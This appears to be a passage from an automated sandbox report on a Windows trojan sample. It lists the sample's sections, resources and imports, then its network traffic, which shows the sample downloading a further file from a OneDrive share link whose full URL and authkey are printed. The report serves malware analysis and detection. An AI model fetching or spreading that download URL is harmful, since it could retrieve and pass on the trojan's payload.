.reloc	0x77000	0x6eec	0x7000	False	0.6196986607142857	data	6.6810323966616	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc	0x7e000	0x42400	0x42400	False	0.4435620577830189	data	6.403601787519998	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_CURSOR	0x7ef0c	0x134	Targa image data - Map 64 x 65536 x 1 +32 "\001"	English	United States
RT_CURSOR	0x7f040	0x134	data	English	United States
RT_CURSOR	0x7f174	0x134	data	English	United States
RT_CURSOR	0x7f2a8	0x134	data	English	United States
RT_CURSOR	0x7f3dc	0x134	data	English	United States
RT_CURSOR	0x7f510	0x134	data	English	United States
RT_CURSOR	0x7f644	0x134	Targa image data - RGB 64 x 65536 x 1 +32 "\001"	English	United States
RT_BITMAP	0x7f778	0x128	Device independent bitmap graphic, 21 x 16 x 4, image size 192	English	United States
RT_BITMAP	0x7f8a0	0x128	Device independent bitmap graphic, 19 x 16 x 4, image size 192	English	United States
RT_BITMAP	0x7f9c8	0x128	Device independent bitmap graphic, 21 x 16 x 4, image size 192	English	United States
RT_BITMAP	0x7faf0	0xe8	Device independent bitmap graphic, 13 x 16 x 4, image size 128	English	United States
RT_BITMAP	0x7fbd8	0x128	Device independent bitmap graphic, 17 x 16 x 4, image size 192	English	United States
RT_BITMAP	0x7fd00	0x128	Device independent bitmap graphic, 20 x 16 x 4, image size 192	English	United States
RT_BITMAP	0x7fe28	0xd0	Device independent bitmap graphic, 13 x 13 x 4, image size 104	English	United States
RT_BITMAP	0x7fef8	0x128	Device independent bitmap graphic, 21 x 16 x 4, image size 192	English	United States
RT_BITMAP	0x80020	0x128	Device independent bitmap graphic, 17 x 16 x 4, image size 192	English	United States
RT_BITMAP	0x80148	0x128	Device independent bitmap graphic, 21 x 16 x 4, image size 192	English	United States
RT_BITMAP	0x80270	0x128	Device independent bitmap graphic, 19 x 16 x 4, image size 192	English	United States
RT_BITMAP	0x80398	0x128	Device independent bitmap graphic, 21 x 16 x 4, image size 192	English	United States
RT_BITMAP	0x804c0	0xe8	Device independent bitmap graphic, 12 x 16 x 4, image size 128	English	United States
RT_BITMAP	0x805a8	0x128	Device independent bitmap graphic, 17 x 16 x 4, image size 192	English	United States
RT_BITMAP	0x806d0	0x128	Device independent bitmap graphic, 20 x 16 x 4, image size 192	English	United States
RT_BITMAP	0x807f8	0xd0	Device independent bitmap graphic, 13 x 13 x 4, image size 104	English	United States
RT_BITMAP	0x808c8	0x128	Device independent bitmap graphic, 21 x 16 x 4, image size 192	English	United States
RT_BITMAP	0x809f0	0x128	Device independent bitmap graphic, 17 x 16 x 4, image size 192	English	United States
RT_BITMAP	0x80b18	0x128	Device independent bitmap graphic, 21 x 16 x 4, image size 192	English	United States
RT_BITMAP	0x80c40	0x128	Device independent bitmap graphic, 19 x 16 x 4, image size 192	English	United States
RT_BITMAP	0x80d68	0x128	Device independent bitmap graphic, 21 x 16 x 4, image size 192	English	United States
RT_BITMAP	0x80e90	0xe8	Device independent bitmap graphic, 13 x 16 x 4, image size 128	English	United States
RT_BITMAP	0x80f78	0x128	Device independent bitmap graphic, 17 x 16 x 4, image size 192	English	United States
RT_BITMAP	0x810a0	0x128	Device independent bitmap graphic, 20 x 16 x 4, image size 192	English	United States
RT_BITMAP	0x811c8	0xd0	Device independent bitmap graphic, 13 x 13 x 4, image size 104	English	United States
RT_BITMAP	0x81298	0x128	Device independent bitmap graphic, 21 x 16 x 4, image size 192	English	United States
RT_BITMAP	0x813c0	0x128	Device independent bitmap graphic, 17 x 16 x 4, image size 192	English	United States
RT_ICON	0x814e8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096
RT_ICON	0x82590	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216
RT_ICON	0x84b38	0x5488	Device independent bitmap graphic, 72 x 144 x 32, image size 20736
RT_ICON	0x89fc0	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 36864
RT_STRING	0x93468	0x200	data
RT_STRING	0x93668	0x188	data
RT_STRING	0x937f0	0xc8	data
RT_STRING	0x938b8	0x350	data
RT_STRING	0x93c08	0x3d8	data
RT_STRING	0x93fe0	0x388	data
RT_STRING	0x94368	0x418	data
RT_STRING	0x94780	0x140	data
RT_STRING	0x948c0	0xcc	data
RT_STRING	0x9498c	0x1ec	data
RT_STRING	0x94b78	0x3b0	data
RT_STRING	0x94f28	0x354	data
RT_STRING	0x9527c	0x2a4	data
RT_RCDATA	0x95520	0x10	data
RT_RCDATA	0x95530	0x2a7c2	GIF image data, version 89a, 300 x 168	English	United States
RT_RCDATA	0xbfcf4	0x254	data
RT_RCDATA	0xbff48	0x3e0	Delphi compiled form 'TForm1'
RT_GROUP_CURSOR	0xc0328	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0xc033c	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0xc0350	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0xc0364	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0xc0378	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0xc038c	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0xc03a0	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_ICON	0xc03b4	0x3e	data

Imports

DLL	Import
oleaut32.dll	SysFreeString, SysReAllocStringLen, SysAllocStringLen
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegCloseKey
user32.dll	GetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
kernel32.dll	GetACP, Sleep, VirtualFree, VirtualAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
kernel32.dll	TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
user32.dll	CreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDlgItem, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
gdi32.dll	UnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, Polyline, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, ExcludeClipRect, DeleteObject, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, BitBlt
version.dll	VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
kernel32.dll	lstrcpyA, lstrcatA, _lread, _lopen, _llseek, _lclose, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtect, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalFindAtomA, GlobalDeleteAtom, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey, IsValidSid
kernel32.dll	Sleep
oleaut32.dll	SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
comctl32.dll	_TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
comdlg32.dll	GetOpenFileNameA
URL	AutodialHookCallback

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 29, 2022 10:41:51.260737896 CET	49694	443	192.168.2.3	13.107.43.13
Nov 29, 2022 10:41:51.260787964 CET	443	49694	13.107.43.13	192.168.2.3
Nov 29, 2022 10:41:51.260881901 CET	49694	443	192.168.2.3	13.107.43.13
Nov 29, 2022 10:41:51.301680088 CET	49694	443	192.168.2.3	13.107.43.13
Nov 29, 2022 10:41:51.301722050 CET	443	49694	13.107.43.13	192.168.2.3
Nov 29, 2022 10:41:51.396750927 CET	443	49694	13.107.43.13	192.168.2.3
Nov 29, 2022 10:41:51.396946907 CET	49694	443	192.168.2.3	13.107.43.13
Nov 29, 2022 10:41:51.686289072 CET	49694	443	192.168.2.3	13.107.43.13
Nov 29, 2022 10:41:51.686328888 CET	443	49694	13.107.43.13	192.168.2.3
Nov 29, 2022 10:41:51.687253952 CET	443	49694	13.107.43.13	192.168.2.3
Nov 29, 2022 10:41:51.687335968 CET	49694	443	192.168.2.3	13.107.43.13
Nov 29, 2022 10:41:51.690499067 CET	49694	443	192.168.2.3	13.107.43.13
Nov 29, 2022 10:41:51.690519094 CET	443	49694	13.107.43.13	192.168.2.3
Nov 29, 2022 10:41:52.246649027 CET	443	49694	13.107.43.13	192.168.2.3
Nov 29, 2022 10:41:52.246813059 CET	443	49694	13.107.43.13	192.168.2.3
Nov 29, 2022 10:41:52.246871948 CET	49694	443	192.168.2.3	13.107.43.13
Nov 29, 2022 10:41:52.246985912 CET	49694	443	192.168.2.3	13.107.43.13
Nov 29, 2022 10:41:52.258460045 CET	49694	443	192.168.2.3	13.107.43.13
Nov 29, 2022 10:41:52.258503914 CET	443	49694	13.107.43.13	192.168.2.3
Nov 29, 2022 10:41:52.373297930 CET	49695	443	192.168.2.3	13.107.43.12
Nov 29, 2022 10:41:52.373383999 CET	443	49695	13.107.43.12	192.168.2.3
Nov 29, 2022 10:41:52.373493910 CET	49695	443	192.168.2.3	13.107.43.12
Nov 29, 2022 10:41:52.375330925 CET	49695	443	192.168.2.3	13.107.43.12
Nov 29, 2022 10:41:52.375380039 CET	443	49695	13.107.43.12	192.168.2.3
Nov 29, 2022 10:41:52.472461939 CET	443	49695	13.107.43.12	192.168.2.3
Nov 29, 2022 10:41:52.472654104 CET	49695	443	192.168.2.3	13.107.43.12
Nov 29, 2022 10:41:52.473560095 CET	443	49695	13.107.43.12	192.168.2.3
Nov 29, 2022 10:41:52.473710060 CET	49695	443	192.168.2.3	13.107.43.12
Nov 29, 2022 10:41:52.496169090 CET	49695	443	192.168.2.3	13.107.43.12
Nov 29, 2022 10:41:52.496221066 CET	443	49695	13.107.43.12	192.168.2.3
Nov 29, 2022 10:41:52.496706009 CET	443	49695	13.107.43.12	192.168.2.3
Nov 29, 2022 10:41:52.496802092 CET	49695	443	192.168.2.3	13.107.43.12
Nov 29, 2022 10:41:52.497447014 CET	49695	443	192.168.2.3	13.107.43.12
Nov 29, 2022 10:41:52.497464895 CET	443	49695	13.107.43.12	192.168.2.3
Nov 29, 2022 10:41:52.742984056 CET	443	49695	13.107.43.12	192.168.2.3
Nov 29, 2022 10:41:52.743009090 CET	443	49695	13.107.43.12	192.168.2.3
Nov 29, 2022 10:41:52.743072033 CET	49695	443	192.168.2.3	13.107.43.12
Nov 29, 2022 10:41:52.743086100 CET	443	49695	13.107.43.12	192.168.2.3
Nov 29, 2022 10:41:52.743117094 CET	443	49695	13.107.43.12	192.168.2.3
Nov 29, 2022 10:41:52.743138075 CET	49695	443	192.168.2.3	13.107.43.12
Nov 29, 2022 10:41:52.743154049 CET	49695	443	192.168.2.3	13.107.43.12
Nov 29, 2022 10:41:52.743190050 CET	443	49695	13.107.43.12	192.168.2.3
Nov 29, 2022 10:41:52.743197918 CET	49695	443	192.168.2.3	13.107.43.12
Nov 29, 2022 10:41:52.743208885 CET	443	49695	13.107.43.12	192.168.2.3
Nov 29, 2022 10:41:52.743266106 CET	49695	443	192.168.2.3	13.107.43.12
Nov 29, 2022 10:41:52.743283987 CET	49695	443	192.168.2.3	13.107.43.12
Nov 29, 2022 10:41:52.767354965 CET	443	49695	13.107.43.12	192.168.2.3
Nov 29, 2022 10:41:52.767493010 CET	49695	443	192.168.2.3	13.107.43.12
Nov 29, 2022 10:41:52.767518997 CET	443	49695	13.107.43.12	192.168.2.3
Nov 29, 2022 10:41:52.767570972 CET	443	49695	13.107.43.12	192.168.2.3
Nov 29, 2022 10:41:52.767627001 CET	49695	443	192.168.2.3	13.107.43.12
Nov 29, 2022 10:41:52.767640114 CET	443	49695	13.107.43.12	192.168.2.3
Nov 29, 2022 10:41:52.767678022 CET	49695	443	192.168.2.3	13.107.43.12
Nov 29, 2022 10:41:52.767690897 CET	443	49695	13.107.43.12	192.168.2.3
Nov 29, 2022 10:41:52.767709017 CET	49695	443	192.168.2.3	13.107.43.12
Nov 29, 2022 10:41:52.767723083 CET	443	49695	13.107.43.12	192.168.2.3
Nov 29, 2022 10:41:52.767776966 CET	49695	443	192.168.2.3	13.107.43.12
Nov 29, 2022 10:41:52.767807961 CET	49695	443	192.168.2.3	13.107.43.12
Nov 29, 2022 10:41:52.767818928 CET	443	49695	13.107.43.12	192.168.2.3
Nov 29, 2022 10:41:52.767868996 CET	49695	443	192.168.2.3	13.107.43.12
Nov 29, 2022 10:41:52.767869949 CET	443	49695	13.107.43.12	192.168.2.3
Nov 29, 2022 10:41:52.767894030 CET	443	49695	13.107.43.12	192.168.2.3
Nov 29, 2022 10:41:52.767936945 CET	49695	443	192.168.2.3	13.107.43.12
Nov 29, 2022 10:41:52.767970085 CET	49695	443	192.168.2.3	13.107.43.12
Nov 29, 2022 10:41:52.767982960 CET	443	49695	13.107.43.12	192.168.2.3
Nov 29, 2022 10:41:52.768018961 CET	443	49695	13.107.43.12	192.168.2.3
Nov 29, 2022 10:41:52.768029928 CET	49695	443	192.168.2.3	13.107.43.12
Nov 29, 2022 10:41:52.768042088 CET	443	49695	13.107.43.12	192.168.2.3
Nov 29, 2022 10:41:52.768094063 CET	49695	443	192.168.2.3	13.107.43.12
Nov 29, 2022 10:41:52.768187046 CET	49695	443	192.168.2.3	13.107.43.12
Nov 29, 2022 10:41:52.768193960 CET	443	49695	13.107.43.12	192.168.2.3
Nov 29, 2022 10:41:52.768244028 CET	49695	443	192.168.2.3	13.107.43.12
Nov 29, 2022 10:41:52.768263102 CET	443	49695	13.107.43.12	192.168.2.3
Nov 29, 2022 10:41:52.768348932 CET	49695	443	192.168.2.3	13.107.43.12
Nov 29, 2022 10:41:52.768362045 CET	443	49695	13.107.43.12	192.168.2.3
Nov 29, 2022 10:41:52.768424034 CET	49695	443	192.168.2.3	13.107.43.12
Nov 29, 2022 10:41:52.793473005 CET	443	49695	13.107.43.12	192.168.2.3
Nov 29, 2022 10:41:52.793580055 CET	49695	443	192.168.2.3	13.107.43.12
Nov 29, 2022 10:41:52.793592930 CET	443	49695	13.107.43.12	192.168.2.3
Nov 29, 2022 10:41:52.793620110 CET	443	49695	13.107.43.12	192.168.2.3
Nov 29, 2022 10:41:52.793670893 CET	49695	443	192.168.2.3	13.107.43.12
Nov 29, 2022 10:41:52.793687105 CET	49695	443	192.168.2.3	13.107.43.12
Nov 29, 2022 10:41:52.793699980 CET	443	49695	13.107.43.12	192.168.2.3
Nov 29, 2022 10:41:52.793730021 CET	443	49695	13.107.43.12	192.168.2.3
Nov 29, 2022 10:41:52.793749094 CET	49695	443	192.168.2.3	13.107.43.12
Nov 29, 2022 10:41:52.793764114 CET	443	49695	13.107.43.12	192.168.2.3
Nov 29, 2022 10:41:52.793796062 CET	49695	443	192.168.2.3	13.107.43.12
Nov 29, 2022 10:41:52.793840885 CET	443	49695	13.107.43.12	192.168.2.3
Nov 29, 2022 10:41:52.793847084 CET	49695	443	192.168.2.3	13.107.43.12
Nov 29, 2022 10:41:52.793863058 CET	443	49695	13.107.43.12	192.168.2.3
Nov 29, 2022 10:41:52.793920040 CET	49695	443	192.168.2.3	13.107.43.12
Nov 29, 2022 10:41:52.793945074 CET	49695	443	192.168.2.3	13.107.43.12
Nov 29, 2022 10:41:52.793955088 CET	443	49695	13.107.43.12	192.168.2.3
Nov 29, 2022 10:41:52.794003963 CET	443	49695	13.107.43.12	192.168.2.3
Nov 29, 2022 10:41:52.794007063 CET	49695	443	192.168.2.3	13.107.43.12
Nov 29, 2022 10:41:52.794028044 CET	443	49695	13.107.43.12	192.168.2.3
Nov 29, 2022 10:41:52.794070959 CET	49695	443	192.168.2.3	13.107.43.12
Nov 29, 2022 10:41:52.794096947 CET	49695	443	192.168.2.3	13.107.43.12
Nov 29, 2022 10:41:52.794107914 CET	443	49695	13.107.43.12	192.168.2.3
Nov 29, 2022 10:41:52.794154882 CET	49695	443	192.168.2.3	13.107.43.12
Nov 29, 2022 10:41:52.794198990 CET	443	49695	13.107.43.12	192.168.2.3
Nov 29, 2022 10:41:52.794277906 CET	49695	443	192.168.2.3	13.107.43.12
Nov 29, 2022 10:41:52.794290066 CET	443	49695	13.107.43.12	192.168.2.3
Nov 29, 2022 10:41:52.794310093 CET	443	49695	13.107.43.12	192.168.2.3
Nov 29, 2022 10:41:52.794334888 CET	49695	443	192.168.2.3	13.107.43.12
Nov 29, 2022 10:41:52.794347048 CET	443	49695	13.107.43.12	192.168.2.3
Nov 29, 2022 10:41:52.794378996 CET	49695	443	192.168.2.3	13.107.43.12
Nov 29, 2022 10:41:52.794403076 CET	49695	443	192.168.2.3	13.107.43.12
Nov 29, 2022 10:41:52.794691086 CET	443	49695	13.107.43.12	192.168.2.3
Nov 29, 2022 10:41:52.794769049 CET	49695	443	192.168.2.3	13.107.43.12
Nov 29, 2022 10:41:52.794781923 CET	443	49695	13.107.43.12	192.168.2.3
Nov 29, 2022 10:41:52.794806004 CET	443	49695	13.107.43.12	192.168.2.3
Nov 29, 2022 10:41:52.794828892 CET	49695	443	192.168.2.3	13.107.43.12
Nov 29, 2022 10:41:52.794841051 CET	443	49695	13.107.43.12	192.168.2.3
Nov 29, 2022 10:41:52.794868946 CET	49695	443	192.168.2.3	13.107.43.12
Nov 29, 2022 10:41:52.794907093 CET	49695	443	192.168.2.3	13.107.43.12
Nov 29, 2022 10:41:52.819806099 CET	443	49695	13.107.43.12	192.168.2.3
Nov 29, 2022 10:41:52.819853067 CET	443	49695	13.107.43.12	192.168.2.3
Nov 29, 2022 10:41:52.819943905 CET	49695	443	192.168.2.3	13.107.43.12
Nov 29, 2022 10:41:52.819977999 CET	443	49695	13.107.43.12	192.168.2.3
Nov 29, 2022 10:41:52.819997072 CET	49695	443	192.168.2.3	13.107.43.12
Nov 29, 2022 10:41:52.820024967 CET	49695	443	192.168.2.3	13.107.43.12
Nov 29, 2022 10:41:52.820203066 CET	443	49695	13.107.43.12	192.168.2.3
Nov 29, 2022 10:41:52.820254087 CET	443	49695	13.107.43.12	192.168.2.3
Nov 29, 2022 10:41:52.820281982 CET	49695	443	192.168.2.3	13.107.43.12
Nov 29, 2022 10:41:52.820295095 CET	443	49695	13.107.43.12	192.168.2.3
Nov 29, 2022 10:41:52.820307016 CET	49695	443	192.168.2.3	13.107.43.12
Nov 29, 2022 10:41:52.820336103 CET	49695	443	192.168.2.3	13.107.43.12
Nov 29, 2022 10:41:52.820746899 CET	443	49695	13.107.43.12	192.168.2.3
Nov 29, 2022 10:41:52.820796967 CET	443	49695	13.107.43.12	192.168.2.3
Nov 29, 2022 10:41:52.820820093 CET	49695	443	192.168.2.3	13.107.43.12
Nov 29, 2022 10:41:52.820836067 CET	443	49695	13.107.43.12	192.168.2.3
Nov 29, 2022 10:41:52.820853949 CET	49695	443	192.168.2.3	13.107.43.12
Nov 29, 2022 10:41:52.820877075 CET	49695	443	192.168.2.3	13.107.43.12
Nov 29, 2022 10:41:52.820902109 CET	443	49695	13.107.43.12	192.168.2.3
Nov 29, 2022 10:41:52.820952892 CET	49695	443	192.168.2.3	13.107.43.12
Nov 29, 2022 10:41:52.822664976 CET	49695	443	192.168.2.3	13.107.43.12
Nov 29, 2022 10:41:52.822690964 CET	443	49695	13.107.43.12	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 29, 2022 10:41:51.199362993 CET	54397	53	192.168.2.3	8.8.8.8
Nov 29, 2022 10:41:52.304203033 CET	59324	53	192.168.2.3	8.8.8.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 29, 2022 10:41:51.199362993 CET	192.168.2.3	8.8.8.8	0x4698	Standard query (0)	onedrive.live.com	A (IP address)	IN (0x0001)	false
Nov 29, 2022 10:41:52.304203033 CET	192.168.2.3	8.8.8.8	0x7cef	Standard query (0)	oyuurg.ph.files.1drv.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 29, 2022 10:41:51.242723942 CET	8.8.8.8	192.168.2.3	0x4698	No error (0)	onedrive.live.com	odc-web-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 29, 2022 10:41:51.242723942 CET	8.8.8.8	192.168.2.3	0x4698	No error (0)	l-0004.l-dc-msedge.net		13.107.43.13	A (IP address)	IN (0x0001)	false
Nov 29, 2022 10:41:52.369076967 CET	8.8.8.8	192.168.2.3	0x7cef	No error (0)	oyuurg.ph.files.1drv.com	ph-files.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 29, 2022 10:41:52.369076967 CET	8.8.8.8	192.168.2.3	0x7cef	No error (0)	ph-files.fe.1drv.com	odc-ph-files-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 29, 2022 10:41:52.369076967 CET	8.8.8.8	192.168.2.3	0x7cef	No error (0)	l-0003.l-dc-msedge.net		13.107.43.12	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

onedrive.live.com

oyuurg.ph.files.1drv.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49694	13.107.43.13	443	C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-29 09:41:51 UTC	0	OUT	GET /download?cid=E0CF7F9E6AAF27EF&resid=E0CF7F9E6AAF27EF%21850&authkey=AEcOcvbyHqeCMT0 HTTP/1.1 User-Agent: 70 Host: onedrive.live.com
2022-11-29 09:41:52 UTC	0	IN	HTTP/1.1 302 Found Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html Expires: -1 Location: https://oyuurg.ph.files.1drv.com/y4mJr27PXKP1w7VmweyBhr9jXuXcCKUmjp-l0AjYgYvmFILscr-gs1ZCYQgPakl85NdXiyluyI2K__n-DTHXtIuKBfix9QJgWA8xZXLmTFKCzO-QrrlJfjFNlxYKvj4CV1InzMNLAsu2pDihkqbVzbigQu3lZ2fbCWy9RogAq5NxzuJ1VRoowitd9q4QmyU6H1eR5JdbJA1JsNbjwDPqFHy3g/Iuigzwjduoa?download&psid=1 Set-Cookie: E=P:t+Kk8e3R2og=:tIdEAmyEM/xmJKyqJk+fu/W18IcOiOH08bjRTj+8lO0=:F; domain=.live.com; path=/ Set-Cookie: xid=e37dde86-3c17-4795-8fe8-b169f221a3c0&&RD0003FF119651&381; domain=.live.com; path=/ Set-Cookie: xidseq=1; domain=.live.com; path=/ Set-Cookie: LD=; domain=.live.com; expires=Tue, 29-Nov-2022 08:01:51 GMT; path=/ Set-Cookie: wla42=; domain=live.com; expires=Tue, 06-Dec-2022 09:41:52 GMT; path=/ X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-MSNServer: RD0003FF119651 X-ODWebServer: centralus1-odwebpl X-Cache: CONFIG_NOCACHE X-MSEdge-Ref: Ref A: 4831EC6D8D1B479E8277C0B070A95C4D Ref B: VIEEDGE2821 Ref C: 2022-11-29T09:41:51Z Date: Tue, 29 Nov 2022 09:41:51 GMT Connection: close Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49695	13.107.43.12	443	C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-29 09:41:52 UTC	1	OUT	GET /y4mJr27PXKP1w7VmweyBhr9jXuXcCKUmjp-l0AjYgYvmFILscr-gs1ZCYQgPakl85NdXiyluyI2K__n-DTHXtIuKBfix9QJgWA8xZXLmTFKCzO-QrrlJfjFNlxYKvj4CV1InzMNLAsu2pDihkqbVzbigQu3lZ2fbCWy9RogAq5NxzuJ1VRoowitd9q4QmyU6H1eR5JdbJA1JsNbjwDPqFHy3g/Iuigzwjduoa?download&psid=1 HTTP/1.1 User-Agent: 70 Host: oyuurg.ph.files.1drv.com Connection: Keep-Alive
